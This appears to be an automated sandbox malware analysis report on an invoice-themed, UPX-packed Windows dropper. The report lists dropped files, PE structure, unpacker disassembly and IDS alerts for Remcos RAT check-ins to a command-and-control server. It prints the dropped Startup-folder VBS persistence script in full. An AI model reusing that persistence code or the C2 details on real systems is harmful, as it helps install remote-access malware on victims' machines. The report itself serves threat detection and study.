                                                                          SHA-256:64ADDCBF4C12AF13CC30A75208952AB12B2A66CCEC42DD6D65297BD067733E54
                                                                          SHA-512:D4C3DCD1DDCB9D5BA519F71C49A4F63D72554930174F0C727A7F6D6CFA6E50ED3142DB7C84F666646FF45914A6A46F1A545577DFFAC6AD405BBDB206C41B8483
                                                                          Malicious:false
                                                                          Preview:EA06.....X..Z}..W.T.W:.0.T.U9..kL.....2.1.L)..y....s.m..Y..iU......T.....%.^..).W4.[*r..ryM.U.6.D..s...X...>...i...~.L..3...~.~6........W.......-....W.x=...o.|.9^?..o.`....eI..a...n...uoX.wJ+......&.......&..s....,^.A..n.v....q.................-u......q.4u....7I.&.1.E&....T.s..6.J..*.J..f..Z`S..2...H. ..2aH......2.Z..h.Jd..w.Z]..S...:aH..r.......(..(`*..iS.eH..L..x........*....T.@1.6..>......Z.Y....UR.i..9.lrO\.P@..U...1.EZeS...|6...g..Te......Uf3."...Ng..H.g.r..o..D.]6..&...6.2......p.G..&..,.IB..... ..R.Ng...#S6......\j.B.J&.i.3as..13..2...F.`.?..ar........UJ.~.w`.Z.^...G*...b.S..0..D......tI.....h%.............aV..d..$Ze..D&..f{p...5i.W'.]j..M.Iq.....l.!1.],...+.R..~`.,"..rt..X....[`u..R.0.N.....Z..j.....k.S;.z..Q.Va4..^1P.@2.f&Am...3.-2.2..".M..-O.Dr.....5.q8.i..4.r<V..,...Fz...H...F.>..l-..F....K...G....pm@.GV...G...Gf.......F....t...9b.y.r$.@.B*......3..9...&....@..P..9...&.........9.....W.ri`.WggO.T.R...k.._j..V.cy.S&..m~-9.s.T..;.9.x<..\.AQ..

                                                                          C:\Users\user\AppData\Local\Temp\aut95C8.tmp

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\acceptancy\turbinals.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):423920
                                                                          Entropy (8bit):7.985721489448969
                                                                          Encrypted:false
                                                                          SSDEEP:12288:m0mJL7t81uJw6rSocqtehC7lYi6/MDFsc9XZ:mLtJw6LcDhC7lYiXXRZ
                                                                          MD5:FBBAB074EA1BC72A76E7E17D4546F64A
                                                                          SHA1:B7E164E3BD18C016F162808550B250EDDC9CCD46
                                                                          SHA-256:64ADDCBF4C12AF13CC30A75208952AB12B2A66CCEC42DD6D65297BD067733E54
                                                                          SHA-512:D4C3DCD1DDCB9D5BA519F71C49A4F63D72554930174F0C727A7F6D6CFA6E50ED3142DB7C84F666646FF45914A6A46F1A545577DFFAC6AD405BBDB206C41B8483
                                                                          Malicious:false
                                                                          Preview:EA06.....X..Z}..W.T.W:.0.T.U9..kL.....2.1.L)..y....s.m..Y..iU......T.....%.^..).W4.[*r..ryM.U.6.D..s...X...>...i...~.L..3...~.~6........W.......-....W.x=...o.|.9^?..o.`....eI..a...n...uoX.wJ+......&.......&..s....,^.A..n.v....q.................-u......q.4u....7I.&.1.E&....T.s..6.J..*.J..f..Z`S..2...H. ..2aH......2.Z..h.Jd..w.Z]..S...:aH..r.......(..(`*..iS.eH..L..x........*....T.@1.6..>......Z.Y....UR.i..9.lrO\.P@..U...1.EZeS...|6...g..Te......Uf3."...Ng..H.g.r..o..D.]6..&...6.2......p.G..&..,.IB..... ..R.Ng...#S6......\j.B.J&.i.3as..13..2...F.`.?..ar........UJ.~.w`.Z.^...G*...b.S..0..D......tI.....h%.............aV..d..$Ze..D&..f{p...5i.W'.]j..M.Iq.....l.!1.],...+.R..~`.,"..rt..X....[`u..R.0.N.....Z..j.....k.S;.z..Q.Va4..^1P.@2.f&Am...3.-2.2..".M..-O.Dr.....5.q8.i..4.r<V..,...Fz...H...F.>..l-..F....K...G....pm@.GV...G...Gf.......F....t...9b.y.r$.@.B*......3..9...&....@..P..9...&.........9.....W.ri`.WggO.T.R...k.._j..V.cy.S&..m~-9.s.T..;.9.x<..\.AQ..

                                                                          C:\Users\user\AppData\Local\Temp\aut9A1D.tmp

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\acceptancy\turbinals.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):423920
                                                                          Entropy (8bit):7.985721489448969
                                                                          Encrypted:false
                                                                          SSDEEP:12288:m0mJL7t81uJw6rSocqtehC7lYi6/MDFsc9XZ:mLtJw6LcDhC7lYiXXRZ
                                                                          MD5:FBBAB074EA1BC72A76E7E17D4546F64A
                                                                          SHA1:B7E164E3BD18C016F162808550B250EDDC9CCD46
                                                                          SHA-256:64ADDCBF4C12AF13CC30A75208952AB12B2A66CCEC42DD6D65297BD067733E54
                                                                          SHA-512:D4C3DCD1DDCB9D5BA519F71C49A4F63D72554930174F0C727A7F6D6CFA6E50ED3142DB7C84F666646FF45914A6A46F1A545577DFFAC6AD405BBDB206C41B8483
                                                                          Malicious:false
                                                                          Preview:EA06.....X..Z}..W.T.W:.0.T.U9..kL.....2.1.L)..y....s.m..Y..iU......T.....%.^..).W4.[*r..ryM.U.6.D..s...X...>...i...~.L..3...~.~6........W.......-....W.x=...o.|.9^?..o.`....eI..a...n...uoX.wJ+......&.......&..s....,^.A..n.v....q.................-u......q.4u....7I.&.1.E&....T.s..6.J..*.J..f..Z`S..2...H. ..2aH......2.Z..h.Jd..w.Z]..S...:aH..r.......(..(`*..iS.eH..L..x........*....T.@1.6..>......Z.Y....UR.i..9.lrO\.P@..U...1.EZeS...|6...g..Te......Uf3."...Ng..H.g.r..o..D.]6..&...6.2......p.G..&..,.IB..... ..R.Ng...#S6......\j.B.J&.i.3as..13..2...F.`.?..ar........UJ.~.w`.Z.^...G*...b.S..0..D......tI.....h%.............aV..d..$Ze..D&..f{p...5i.W'.]j..M.Iq.....l.!1.],...+.R..~`.,"..rt..X....[`u..R.0.N.....Z..j.....k.S;.z..Q.Va4..^1P.@2.f&Am...3.-2.2..".M..-O.Dr.....5.q8.i..4.r<V..,...Fz...H...F.>..l-..F....K...G....pm@.GV...G...Gf.......F....t...9b.y.r$.@.B*......3..9...&....@..P..9...&.........9.....W.ri`.WggO.T.R...k.._j..V.cy.S&..m~-9.s.T..;.9.x<..\.AQ..

                                                                          C:\Users\user\AppData\Local\Temp\aut9DA7.tmp

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\acceptancy\turbinals.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):423920
                                                                          Entropy (8bit):7.985721489448969
                                                                          Encrypted:false
                                                                          SSDEEP:12288:m0mJL7t81uJw6rSocqtehC7lYi6/MDFsc9XZ:mLtJw6LcDhC7lYiXXRZ
                                                                          MD5:FBBAB074EA1BC72A76E7E17D4546F64A
                                                                          SHA1:B7E164E3BD18C016F162808550B250EDDC9CCD46
                                                                          SHA-256:64ADDCBF4C12AF13CC30A75208952AB12B2A66CCEC42DD6D65297BD067733E54
                                                                          SHA-512:D4C3DCD1DDCB9D5BA519F71C49A4F63D72554930174F0C727A7F6D6CFA6E50ED3142DB7C84F666646FF45914A6A46F1A545577DFFAC6AD405BBDB206C41B8483
                                                                          Malicious:false
                                                                          Preview:EA06.....X..Z}..W.T.W:.0.T.U9..kL.....2.1.L)..y....s.m..Y..iU......T.....%.^..).W4.[*r..ryM.U.6.D..s...X...>...i...~.L..3...~.~6........W.......-....W.x=...o.|.9^?..o.`....eI..a...n...uoX.wJ+......&.......&..s....,^.A..n.v....q.................-u......q.4u....7I.&.1.E&....T.s..6.J..*.J..f..Z`S..2...H. ..2aH......2.Z..h.Jd..w.Z]..S...:aH..r.......(..(`*..iS.eH..L..x........*....T.@1.6..>......Z.Y....UR.i..9.lrO\.P@..U...1.EZeS...|6...g..Te......Uf3."...Ng..H.g.r..o..D.]6..&...6.2......p.G..&..,.IB..... ..R.Ng...#S6......\j.B.J&.i.3as..13..2...F.`.?..ar........UJ.~.w`.Z.^...G*...b.S..0..D......tI.....h%.............aV..d..$Ze..D&..f{p...5i.W'.]j..M.Iq.....l.!1.],...+.R..~`.,"..rt..X....[`u..R.0.N.....Z..j.....k.S;.z..Q.Va4..^1P.@2.f&Am...3.-2.2..".M..-O.Dr.....5.q8.i..4.r<V..,...Fz...H...F.>..l-..F....K...G....pm@.GV...G...Gf.......F....t...9b.y.r$.@.B*......3..9...&....@..P..9...&.........9.....W.ri`.WggO.T.R...k.._j..V.cy.S&..m~-9.s.T..;.9.x<..\.AQ..

                                                                          C:\Users\user\AppData\Local\Temp\bhv7BD7.tmp

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\acceptancy\turbinals.exe
                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb8da28c5, page size 32768, DirtyShutdown, Windows version 10.0
                                                                          Category:dropped
                                                                          Size (bytes):18874368
                                                                          Entropy (8bit):0.8289311070341717
                                                                          Encrypted:false
                                                                          SSDEEP:6144:oA/kqb7hP0u1fM1iM15Sd+qk5J/p1CUNL5NCAMPqpXqp5qpkQFeX+SQFFqpDvoQa:zD88+zewCevKKNb+EsUq3
                                                                          MD5:116BD981DB6B0DEA9E81FA21F0EF4FDE
                                                                          SHA1:6831393A305B9B6A5686054F09BB9F1838E26D2A
                                                                          SHA-256:507BD08B97D119B97B2AE44FAE592802394C90853DFBB8DD9AC0FBB1833B4E19
                                                                          SHA-512:8E50156797C0FC2E8201A34802E0B02F343F0FF51E4761F273251A76FD5A571CB1E354FED641D62D3C73D06CD4249D7DAD24FC42317CA1DA004C4D3068930083
                                                                          Malicious:false
                                                                          Preview:..(.... ....................1...{........................v..........{...(...|{.h.x..............................1...{..............................................................................................d...........eJ......n........................................................................................................... ............{..............................................................................................................................................................................................3....{.......................................(...|.4.................95..(...|{..........................#......h.x.....................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\nonhazardousness

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\z49FACTURA-0987678.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):492544
                                                                          Entropy (8bit):7.622274314987341
                                                                          Encrypted:false
                                                                          SSDEEP:12288:VqJQ9RCvyBggtP22gHqr2EzQuaKt4ZmQXvMhGaI:UsrmKzz9H4ZmQmI
                                                                          MD5:1D91EEEBB3B92B76F541713EF2BFD0EE
                                                                          SHA1:05A109DAAFCE3D39D6FB3B9E747614A1531F2890
                                                                          SHA-256:206627C14F57B9B6CE47B972DA9538C1FC4E941626B803ABE5C852E54F309795
                                                                          SHA-512:C55BC96B3DE8722E89217116A8B6959857C1BEB822BD95284789513B5FF88CA6EF4124156F7D212488249083505268CF68CE59DA729DD3B7378B030C89E98489
                                                                          Malicious:false
                                                                          Preview:.c.5OKZW4SDY..L0.S2S985L.ZW0SDYU1L0HS2S985LKZW0SDYU1L0HS2S98=MKZY/.JY.8...R~..l]%8z'B<#+4\lS)=\<M.W)k("^s-7uu.ch>]7\.8AA~W0SDYU1............x..U......._..._...<.o..y...co..p.m.I......l..z.........y...x...cs.....x.....#i..q.._j|.....F......kQV$....SDYU1L0H.wS9t4IK1..4DYU1L0HS.S;9>MEJWPVDYu3L0HS2i.;5L[ZW0#AYU1.0HC2S9:5LNZV0SDYU4L1HS2S98.KKZS0SDYU1N0H.2S)85\KZW0CDYE1L0HS2C985LKZW0SDYu.J0LR2S9X2L..W0SDYU1L0HS2S985LKZ.7S.bU1\.NS.S985LKZW0SDYU1L0HS2..>5TKZWx.BY.1L0HS2S985LK*R0.@YU1L0HS2S985LKZW0SDYU1L0HS.'\@ALKZJoVDYE1L0(V2S=85LKZW0SDYU1L0hS23.JQ-?;W0S.XU1<5HS.R98QIKZW0SDYU1L0HSrS9x.(*.60SD5.1L0HT2S785L.\W0SDYU1L0HS2Sy85.e($B0DYU..0HSRT98.LKZ.6SDYU1L0HS2S98uLK.yB6(661L.sS2S.?5LwZW0.CYU1L0HS2S985L.ZWrSDYU1L0HS2S985LKZW0SDYU1L0HS2S985LKZW0SDYU1L0HS2S985LKZW0SDYU1L0HS2S985LKZW0SDYU1L0HS2S985LKZW0SDYU1L0HS2S985LKZW0SDYU1L0HS2S985LKZW0SDYU1L0HS2S985LKZW0SDYU1L0HS2S985LKZW0SDYU1L0HS2S985LKZW0SDYU1L0HS2S985LKZW0SDYU1L0HS2S985LKZW0SDYU1L0HS2S985LKZW0SDYU1L0HS2S985LKZW0SDYU1L0HS2S985LKZW0SDY

                                                                          C:\Users\user\AppData\Local\Temp\ntpiwvxpqbhwumsvyl

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\acceptancy\turbinals.exe
                                                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):2
                                                                          Entropy (8bit):1.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:Qn:Qn
                                                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                          Malicious:false
                                                                          Preview:..

                                                                          C:\Users\user\AppData\Local\acceptancy\turbinals.exe

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\z49FACTURA-0987678.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                          Category:dropped
                                                                          Size (bytes):875008
                                                                          Entropy (8bit):7.963510957506074
                                                                          Encrypted:false
                                                                          SSDEEP:24576:Zrl6kD68JmlotQf0hwmcZIR5MRsJOjOZW89S+7Ed7b:1l328U2yf0CmOeMRsnZW8o/h
                                                                          MD5:876F47F33C5975497C15BF24D50952B5
                                                                          SHA1:A47579EA0E5D47CEB89CBB3450F4C482768A0BF8
                                                                          SHA-256:49E8A1F12FB5202470604EFE01C0D60949D20D302A76AED85B2A049E91266366
                                                                          SHA-512:7346F82C0C7065D2DE4EC5D5747235CE0ADA6E799E6CF461A57CE15969CCD0BF92BF7D5EFB2E5B57AD4BE0DEFD3A716BDB6A8C609E0ABBE0FB3832F5CFBFD6C3
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 26%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L.....Ng.........."......`..........Pz... ........@.......................................@...@.......@......................r..$...........................$v......................................4|..H...........................................UPX0....................................UPX1.....`... ...^..................@....rsrc................b..............@..............................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....

                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\turbinals.vbs

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\acceptancy\turbinals.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):278
                                                                          Entropy (8bit):3.4189284708771144
                                                                          Encrypted:false
                                                                          SSDEEP:6:DMM8lfm3OOQdUfclq7UEZ+lX1ElGUM+GuipWBnriIM8lfQVn:DsO+vNlq7Q1ElPM+Gu6WRmA2n
                                                                          MD5:1A239AF3BBBAFDC8767CC356FA738C50
                                                                          SHA1:B6B8D28EDB7604591AC3CA133AC4CF55DC46B483
                                                                          SHA-256:A67FE1C9EFA3B289911C65D1807EFF06734825597AA74DEC91A2409B212168A8
                                                                          SHA-512:6E31005A250E98CC1C28C2E33F7687C310072BE104A10A486DF876FF3257E93217D060F41900644F6B120B2A0AC8EE7854C0BC935494D39EC9207CE7213376FD
                                                                          Malicious:true
                                                                          Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.b.r.o.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.a.c.c.e.p.t.a.n.c.y.\.t.u.r.b.i.n.a.l.s...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                          Entropy (8bit):7.963510957506074
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.39%
                                                                          • UPX compressed Win32 Executable (30571/9) 0.30%
                                                                          • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          File name:z49FACTURA-0987678.exe
                                                                          File size:875'008 bytes
                                                                          MD5:876f47f33c5975497c15bf24d50952b5
                                                                          SHA1:a47579ea0e5d47ceb89cbb3450f4c482768a0bf8
                                                                          SHA256:49e8a1f12fb5202470604efe01c0d60949d20d302a76aed85b2a049e91266366
                                                                          SHA512:7346f82c0c7065d2de4ec5d5747235ce0ada6e799e6cf461a57ce15969ccd0bf92bf7d5efb2e5b57ad4be0defd3a716bdb6a8c609e0abbe0fb3832f5cfbfd6c3
                                                                          SSDEEP:24576:Zrl6kD68JmlotQf0hwmcZIR5MRsJOjOZW89S+7Ed7b:1l328U2yf0CmOeMRsnZW8o/h
                                                                          TLSH:751523B4ADD5EC26E25C67B881398C8415E678339EC8771EC624F25FFC58303C84AA5E
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                                          File Icon

                                                                          Icon Hash:aaf3e3e3938382a0

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x557a50
                                                                          Entrypoint Section:UPX1
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x674EF005 [Tue Dec 3 11:48:21 2024 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:5
                                                                          OS Version Minor:1
                                                                          File Version Major:5
                                                                          File Version Minor:1
                                                                          Subsystem Version Major:5
                                                                          Subsystem Version Minor:1
                                                                          Import Hash:fc6683d30d9f25244a50fd5357825e79

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          pushad
                                                                          mov esi, 00502000h
                                                                          lea edi, dword ptr [esi-00101000h]
                                                                          push edi
                                                                          jmp 00007F204CBACDBDh
                                                                          nop
                                                                          mov al, byte ptr [esi]
                                                                          inc esi
                                                                          mov byte ptr [edi], al
                                                                          inc edi
                                                                          add ebx, ebx
                                                                          jne 00007F204CBACDB9h
                                                                          mov ebx, dword ptr [esi]
                                                                          sub esi, FFFFFFFCh
                                                                          adc ebx, ebx
                                                                          jc 00007F204CBACD9Fh
                                                                          mov eax, 00000001h
                                                                          add ebx, ebx
                                                                          jne 00007F204CBACDB9h
                                                                          mov ebx, dword ptr [esi]
                                                                          sub esi, FFFFFFFCh
                                                                          adc ebx, ebx
                                                                          adc eax, eax
                                                                          add ebx, ebx
                                                                          jnc 00007F204CBACDBDh
                                                                          jne 00007F204CBACDDAh
                                                                          mov ebx, dword ptr [esi]
                                                                          sub esi, FFFFFFFCh
                                                                          adc ebx, ebx
                                                                          jc 00007F204CBACDD1h
                                                                          dec eax
                                                                          add ebx, ebx
                                                                          jne 00007F204CBACDB9h
                                                                          mov ebx, dword ptr [esi]
                                                                          sub esi, FFFFFFFCh
                                                                          adc ebx, ebx
                                                                          adc eax, eax
                                                                          jmp 00007F204CBACD86h
                                                                          add ebx, ebx
                                                                          jne 00007F204CBACDB9h
                                                                          mov ebx, dword ptr [esi]
                                                                          sub esi, FFFFFFFCh
                                                                          adc ebx, ebx
                                                                          adc ecx, ecx
                                                                          jmp 00007F204CBACE04h
                                                                          xor ecx, ecx
                                                                          sub eax, 03h
                                                                          jc 00007F204CBACDC3h
                                                                          shl eax, 08h
                                                                          mov al, byte ptr [esi]
                                                                          inc esi
                                                                          xor eax, FFFFFFFFh
                                                                          je 00007F204CBACE27h
                                                                          sar eax, 1
                                                                          mov ebp, eax
                                                                          jmp 00007F204CBACDBDh
                                                                          add ebx, ebx
                                                                          jne 00007F204CBACDB9h
                                                                          mov ebx, dword ptr [esi]
                                                                          sub esi, FFFFFFFCh
                                                                          adc ebx, ebx
                                                                          jc 00007F204CBACD7Eh
                                                                          inc ecx
                                                                          add ebx, ebx
                                                                          jne 00007F204CBACDB9h
                                                                          mov ebx, dword ptr [esi]
                                                                          sub esi, FFFFFFFCh
                                                                          adc ebx, ebx
                                                                          jc 00007F204CBACD70h
                                                                          add ebx, ebx
                                                                          jne 00007F204CBACDB9h
                                                                          mov ebx, dword ptr [esi]
                                                                          sub esi, FFFFFFFCh
                                                                          adc ebx, ebx
                                                                          adc ecx, ecx
                                                                          add ebx, ebx
                                                                          jnc 00007F204CBACDA1h
                                                                          jne 00007F204CBACDBBh
                                                                          mov ebx, dword ptr [esi]
                                                                          sub esi, FFFFFFFCh
                                                                          adc ebx, ebx
                                                                          jnc 00007F204CBACD96h
                                                                          add ecx, 02h
                                                                          cmp ebp, FFFFFB00h
                                                                          adc ecx, 02h
                                                                          lea edx, dword ptr [edi+ebp]
                                                                          cmp ebp, FFFFFFFCh
                                                                          jbe 00007F204CBACDC0h
                                                                          mov al, byte ptr [edx]

                                                                          Rich Headers

                                                                          Programming Language:
                                                                          • [ASM] VS2013 build 21005
                                                                          • [ C ] VS2013 build 21005
                                                                          • [C++] VS2013 build 21005
                                                                          • [ C ] VS2008 SP1 build 30729
                                                                          • [IMP] VS2008 SP1 build 30729
                                                                          • [ASM] VS2013 UPD4 build 31101
                                                                          • [RES] VS2013 build 21005
                                                                          • [LNK] VS2013 UPD4 build 31101

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x1d72000x424.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1580000x7f200.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1d76240xc.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x157c340x48UPX1
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          UPX00x10000x1010000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          UPX10x1020000x560000x55e00e4e90b309c98138c3969546fedea886eFalse0.9871326874090247data7.935377881941457IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .rsrc0x1580000x800000x7f8001f8d90fd4dc042a0cba3387ad8fec4e8False0.9597675398284313data7.957214635968932IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                          Resources

                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_ICON0x1585ac0x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                          RT_ICON0x1586d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                          RT_ICON0x1588040x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                          RT_ICON0x1589300x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                          RT_ICON0x158c1c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                          RT_ICON0x158d480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                          RT_ICON0x159bf40x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                          RT_ICON0x15a4a00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                          RT_ICON0x15aa0c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                          RT_ICON0x15cfb80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                          RT_ICON0x15e0640x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                          RT_MENU0xcd4a00x50emptyEnglishGreat Britain0
                                                                          RT_STRING0xcd4f00x594emptyEnglishGreat Britain0
                                                                          RT_STRING0xcda840x68aemptyEnglishGreat Britain0
                                                                          RT_STRING0xce1100x490emptyEnglishGreat Britain0
                                                                          RT_STRING0xce5a00x5fcemptyEnglishGreat Britain0
                                                                          RT_STRING0xceb9c0x65cemptyEnglishGreat Britain0
                                                                          RT_STRING0xcf1f80x466emptyEnglishGreat Britain0
                                                                          RT_STRING0xcf6600x158emptyEnglishGreat Britain0
                                                                          RT_RCDATA0x15e4d00x78797data1.0003262655964074
                                                                          RT_GROUP_ICON0x1d6c6c0x76dataEnglishGreat Britain0.6610169491525424
                                                                          RT_GROUP_ICON0x1d6ce80x14dataEnglishGreat Britain1.25
                                                                          RT_GROUP_ICON0x1d6d000x14dataEnglishGreat Britain1.15
                                                                          RT_GROUP_ICON0x1d6d180x14dataEnglishGreat Britain1.25
                                                                          RT_VERSION0x1d6d300xdcdataEnglishGreat Britain0.6181818181818182
                                                                          RT_MANIFEST0x1d6e100x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                          Imports

                                                                          DLLImport
                                                                          KERNEL32.DLLLoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                                                                          ADVAPI32.dllGetAce
                                                                          COMCTL32.dllImageList_Remove
                                                                          COMDLG32.dllGetOpenFileNameW
                                                                          GDI32.dllLineTo
                                                                          IPHLPAPI.DLLIcmpSendEcho
                                                                          MPR.dllWNetUseConnectionW
                                                                          ole32.dllCoGetObject
                                                                          OLEAUT32.dllVariantInit
                                                                          PSAPI.DLLGetProcessMemoryInfo
                                                                          SHELL32.dllDragFinish
                                                                          USER32.dllGetDC
                                                                          USERENV.dllLoadUserProfileW
                                                                          UxTheme.dllIsThemeActive
                                                                          VERSION.dllVerQueryValueW
                                                                          WININET.dllFtpOpenFileW
                                                                          WINMM.dlltimeGetTime
                                                                          WSOCK32.dllconnect

                                                                          Possible Origin

                                                                          Language of compilation systemCountry where language is spokenMap
                                                                          EnglishGreat Britain

                                                                          Network Behavior

                                                                          Suricata IDS Alerts

                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                          2024-12-03T15:40:12.448808+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.1049703192.210.150.268787TCP
                                                                          2024-12-03T15:40:13.609424+01002032777ET MALWARE Remcos 3.x Unencrypted Server Response1192.210.150.268787192.168.2.1049703TCP
                                                                          2024-12-03T15:40:16.569413+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.1049710178.237.33.5080TCP
                                                                          2024-12-03T15:42:38.466482+01002032777ET MALWARE Remcos 3.x Unencrypted Server Response1192.210.150.268787192.168.2.1049703TCP

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Dec 3, 2024 15:40:12.328214884 CET497038787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:12.448277950 CET878749703192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:12.448373079 CET497038787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:12.448807955 CET497038787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:12.568784952 CET878749703192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:13.609424114 CET878749703192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:13.611001968 CET497038787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:13.731040955 CET878749703192.210.150.26192.168.2.10
